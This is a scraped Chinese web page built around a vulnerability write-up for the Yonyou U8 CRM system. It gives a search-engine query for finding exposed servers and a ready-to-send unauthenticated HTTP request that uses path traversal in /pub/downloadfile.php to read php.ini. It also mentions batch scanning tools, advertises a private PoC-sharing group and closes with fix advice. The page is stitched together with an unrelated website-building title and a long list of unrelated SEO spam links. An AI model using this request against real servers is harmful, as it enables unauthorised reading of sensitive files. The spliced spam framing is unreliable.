当前位置: 首页 > news >正文

php一台电脑做网站网络服务商主要包括哪些

php一台电脑做网站,网络服务商主要包括哪些,东莞东城招聘网最新招聘,做自己照片视频网站0x01 产品简介 用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。 0x02 漏洞概述 用友 U8 CRM客户关系管理系统 /pub/downloadfile.php接囗处存在任意文件读取漏洞,未经身份验证的远程攻击…

0x01 产品简介

用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

0x02 漏洞概述

用友 U8 CRM客户关系管理系统 /pub/downloadfile.php接囗处存在任意文件读取漏洞,未经身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息,导致系统处于极不安全的状态。

0x03 搜索引擎

app="用友U8CRM"

在这里插入图片描述

0x04 漏洞复现

GET /pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../apache/php.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、关闭互联网暴露面或设置访问策略
2、部署WAF,针对…/…/…/进行拦截
3、向官方索要补丁修复

http://www.15wanjia.com/news/12532.html

相关文章:

  • 网站建设改版潍坊seo按天收费
  • 河北网站建设模板2023今天的新闻联播
  • 石家庄建设集团网站域名解析查询站长工具
  • 黑群晖做网站接单平台
  • 做兼职的网站有哪些工作网站页面
  • 科技网站哪个好推广产品的软文怎么写
  • 做网站开发怎么接单百度网站是什么
  • wordpress怎么删除预建网站广告推送平台
  • 球球cdk怎么做网站百度大数据查询
  • 建好网站后如何向里面加东西做网站的好处
  • wordpress提交百度站长2022今天刚刚发生地震了
  • 软件公司怎么找客户青岛快速排名优化
  • 旅行做攻略的网站2022百度搜索风云榜
  • 大数据做网站流量分析南京百度seo排名
  • 茂名住房和城乡建设部网站网站换友链平台
  • 科技公司网站模板360提交网站收录入口
  • 网站建设培训教程关键词代发包收录
  • 做网站的时候卖过假货而出过事优化设计答案五年级下册
  • 泰国做网站赌博要判几年站长工具seo推广
  • 怎么制作微网站武汉seo关键词排名优化
  • 青岛建站模板制作电商平台推广公司
  • 备案网站名称怎么写个人友の 连接
  • 网站互动性网盟推广是什么意思
  • 有人做网站吗百度网址
  • flash网站素材下载广东seo点击排名软件哪里好
  • 手机网站建设中心惠州百度seo
  • 创建一家网站如何创手机免费建网站
  • 大网站都开放自己的cms系统网络推广计划书
  • 公司网站维护怎么弄市场营销网站
  • 深圳微商城网站设计万网域名查询